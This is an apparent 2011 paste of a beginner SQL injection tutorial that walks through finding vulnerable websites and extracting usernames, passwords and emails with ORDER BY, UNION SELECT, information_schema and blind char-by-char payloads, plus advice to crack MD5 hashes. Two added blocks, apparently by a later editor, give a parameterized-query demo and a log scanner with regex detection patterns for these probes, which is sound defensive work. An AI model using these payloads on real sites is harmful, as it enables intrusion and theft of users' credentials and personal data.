p00l_b0y SQLi

a guest
Jun 24th, 2011
This is a beginners tutorial for SQL Injection written by p00l_b0y :)

SQL stands for Structured Query Language and it's a programming language designed by IBM that basically stores data for a server in a table, similar to using a table in spreadsheets. It is how the server will store the data. We can manipulate the database a website is using to store content using SQL injection, or as I will call it, sqli. The databases may contain usernames, user passwords, news articles, emails, and much more... anything the server is storing.

First you need to find a vulnerable site. There are tons of tools that can tell you if it's vuln or not, but I will teach how to do it without a program, so you can understand it :)
First you need to find out what features the database is using, like searches, registration or GET pages... this is what we will use, GET. Here is an example of how GET works...

http://example.com/index.php?page=1

The '?' followed by a name and then a value is what is known as a GET. The GET here is telling the server to grab all the info under the name "1" and to display it on the web-page. So to get the data from "1" it must look it up in a database to show this info on the webpage, so now we need to get this data from the database to see if it's vuln. We can check by typing this...

http://example.com?page=1--

IF there is an error displayed then we can continue, because this would tell an sql server to ignore the last tick. If there is no error then find another website. Also, if it doesn't display anything then that doesn't mean it's not vuln.

There are several programs to use for sqli, the most popular are Havij and SQLmap.

NOTE:
In this tutorial, I am not going to show you how to use a specific program, I am just going to show the basic outline of how sqli works so you can understand it and use it yourself. I MIGHT write a part 2 to this tut that shows how to use Havij, but I will see how this one goes first :)

So there are three categories of data in a SQL database or server. They are databases, tables, and columns. Databases contain tables, tables contain columns, columns contain information, the information we want.

There are many different ways to get this info using different types of sql injection:

-Blind sqli
-Signature Evasion
-Filter bypass
-Poorly filtered strings
-Incorrect type handling

The first form of sqli I will discuss in this tut is poorly filtered strings. Poorly filtered strings means that the web master did not do his job and didn't filter the GET info correctly; this creates a vuln for sqli. Now we will inject the sql query by first finding out how many columns it has.

Remember, databases contain tables, tables contain columns, columns contain information, the information we want.

http://example.com?page=1 ORDER BY 1--
http://example.com?page=1 ORDER BY 2--
http://example.com?page=1 ORDER BY 3--
http://example.com?page=1 ORDER BY 4--

We have an error when we type ORDER BY 4--, so this tells us there are 3 columns of info, get it?

So we can combine the statements together with a UNION statement, meaning combine them...

http://example.com?page=1 UNION ALL SELECT 1,2--

This will now display the number of columns on your screen; the number it displays is the number we use to exploit the site. (The number of values in the SELECT has to match the column count you found with ORDER BY; the examples from here on use a two-column query.) Now we will need to see what version of sql the target is using to see if it's vuln...

http://example.com?page=1 UNION ALL SELECT 1,@@version--

This will display the version of the database. If the version is above 5 that means it is a mysql database and still may be vuln. In this tutorial I will be exploiting column 1. Now we exploit the data from the mysql database by typing this...

http://example.com?page=1 UNION ALL SELECT 1,table_name FROM information_schema.tables--

This will display the current tables that may have the info we want, so look for a table name that may have some precious info in it. Now we need to get the column names in which the info is stored...
Remember, databases contain tables, tables contain columns, columns contain information, the information we want.

http://example.com?page=1 UNION ALL SELECT 1,column_name FROM information_schema.columns WHERE table_name='[table]'--

Replace [table] with the name of the table you want. This should display all the columns in the table, so look for a column called id, username, password, email etc. Passwords may be encrypted, so use an MD5 cracker to view them as plain text :) Type this to open the column of a user and their password:

http://example.com?page=1 UNION ALL SELECT 1,concat(username,0x3a,password,0x3a,email) FROM [table]--

So [table] is the table we are in, concat means to group them together (username, password) and 0x3a means ':' in hex, so it displays all the bits that have the username and password. Your output will look something like this...

username:password:email
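
An added example (my code, not part of the original paste): the "poorly filtered string" the tut above is describing, next to the parameterized version that closes the hole. It assumes an in-memory SQLite table called news standing in for the site's database, and runs the tut's own ORDER BY and UNION probes against both handlers.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the site's database (constructed sample data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (id INTEGER, title TEXT)")
    con.executemany("INSERT INTO news VALUES (?, ?)", [(1, "hello"), (2, "world")])
    return con

def vulnerable_page(con, page):
    # The raw GET value is pasted into the query text, so anything after the
    # number is parsed as SQL: this is the "poorly filtered string" of the tut.
    return con.execute("SELECT id, title FROM news WHERE id = " + page).fetchall()

def safe_page(con, page):
    # Bound parameter: the whole string is compared as a value and never parsed,
    # so ORDER BY / UNION / -- inside it are just characters that match no row.
    return con.execute("SELECT id, title FROM news WHERE id = ?", (page,)).fetchall()

def probe(handler, page):
    """Run one handler with an attacker-controlled page value.

    Returns ("rows", rows) or ("error", message); the message is exactly what a
    site that prints database errors would leak back to the visitor.
    """
    try:
        return ("rows", handler(make_db(), page))
    except sqlite3.Error as exc:
        return ("error", str(exc))

if __name__ == "__main__":
    for value in ("1", "1 ORDER BY 4--", "1 UNION ALL SELECT 1,2--"):
        print(repr(value), "vulnerable:", probe(vulnerable_page, value))
        print(repr(value), "safe:      ", probe(safe_page, value))
```

With the concatenated query the ORDER BY probe leaks a database error and the UNION probe returns an extra row; the bound query returns the real row for "1" and nothing at all for either probe.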


The second form of sqli I will talk about in this tut is blind sqli. Some web-masters might try and hide the errors when you type

http://example.com?page=1--

So then we will use blind sqli :)
This is called a blind sqli attack because you will not see any error messages; it is a different technique. We are going to use benchmark() in this tut. So type this...

http://example.com?page=1
This should display the website, it's true.

http://example.com?page=1 and 1=1
This should also display the website, it's true.

http://example.com?page=1 and 1=2
This is not true; if it does not display the website normally then it's vuln :)
(see how it's called a blind sqli X))

Again, we will check the version of the database...

http://example.com?page=1 and substring(@@version,1,1)=5
So this will return true if the database is version 5.
NOTE: substring means part of a string...
So we will continue if it's version 5.

http://example.com/news.php?page=1 and (select 1 from mysql.user limit 0,1)=1
If this doesn't work then you will have to find another technique for blind sql, but if it works, then you can get more info.

http://www.example.com/news.php?id=5 and (select 1 from [table] limit 0,1)=1
Since this is a blind sqli, you will have to guess the table name, but web-masters are people too, so try users, members, emails, usernames, etc.
We are using limit 0,1 due to restrictions in the subselect.
SO the fun part comes up next, guessing more tables and spamming the sql query :) FUN!

http://example.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
This will pull the first character from the first row of info, then convert it to an ascii value and compare it against the value 80. If it comes back true, use the 80. If it's false then decrease the value 80 until it's true. Keep doing this till you come to a point where an increase by 1 is true, and a decrease by 1 is false. You now have your character. Use an ASCII chart from Google to help.
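
An added example (my code, not part of the original paste) from the other side of the wire: every probe in this tut, both the error-based ones (ORDER BY, UNION, @@version, information_schema) and the blind ones (and 1=1, ascii(substring(...)), benchmark()), lands in the web server's access log, and this scans such a log for them. The indicator names and regexes are my own assumptions, not a vendor ruleset, and the log lines are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Indicators run against the URL-decoded, lower-cased request path (my own labels, one per phase of the tut).
SQLI_INDICATORS = {
    "order-by-count": re.compile(r"\border\s+by\s+\d+\s*--"),              # column counting
    "union-select": re.compile(r"\bunion\b(\s+all)?\s+select\b"),          # pulling data via UNION
    "version-fingerprint": re.compile(r"@@version|\bversion\s*\("),        # version check
    "schema-enum": re.compile(r"information_schema\.|\bmysql\.user\b"),    # table/column listing
    "boolean-blind": re.compile(r"\band\s+\d+\s*=\s*\d+\b"),               # and 1=1 / and 1=2
    "char-by-char": re.compile(r"\bascii\s*\(\s*substring\s*\("),          # blind extraction
    "time-based": re.compile(r"\bbenchmark\s*\(|\bsleep\s*\("),            # benchmark() delays
}

# Common/combined access-log line; only the fields the scan needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def classify_request(path):
    """Return the indicator names that fire on one request path."""
    decoded = unquote_plus(path).lower()
    return [name for name, rx in SQLI_INDICATORS.items() if rx.search(decoded)]

def scan_log(lines):
    """Return (ip, path, tags) for every parseable line with at least one indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m["path"])
        if tags:
            hits.append((m["ip"], m["path"], tags))
    return hits

def escalate(hits, min_phases=2):
    """IPs seen in min_phases or more distinct phases: a walk through the tut, not a stray hit."""
    phases = {}
    for ip, _, tags in hits:
        phases.setdefault(ip, set()).update(tags)
    return sorted(ip for ip, seen in phases.items() if len(seen) >= min_phases)

# Constructed sample log (not real traffic): one normal request, then the tut's probes.
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Jun/2011:10:00:01 +0000] "GET /index.php?page=1 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [24/Jun/2011:10:00:05 +0000] "GET /index.php?page=1%20ORDER%20BY%204-- HTTP/1.1" 500 312',
    '203.0.113.7 - - [24/Jun/2011:10:00:09 +0000] "GET /index.php?page=1%20UNION%20ALL%20SELECT%201,@@version-- HTTP/1.1" 200 5204',
    '198.51.100.9 - - [24/Jun/2011:10:02:00 +0000] "GET /news.php?page=1%20and%201=2 HTTP/1.1" 200 4011',
    '198.51.100.9 - - [24/Jun/2011:10:02:30 +0000] "GET /news.php?id=5%20and%20ascii(substring((SELECT%20concat(username,0x3a,password)%20from%20users%20limit%200,1),1,1))>80 HTTP/1.1" 200 4011',
]
```

A single hit can be a false positive; escalate() only reports a client that has moved through two or more phases, which is what the sequence in this tut looks like from the server.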

I will stop the tut here, it's long enough. I am tired as balls, so if you want to learn more ways of sqli like filter evasions and stuff, google it. I might make a part 2 to this tut if you guys like it :)

We are legion.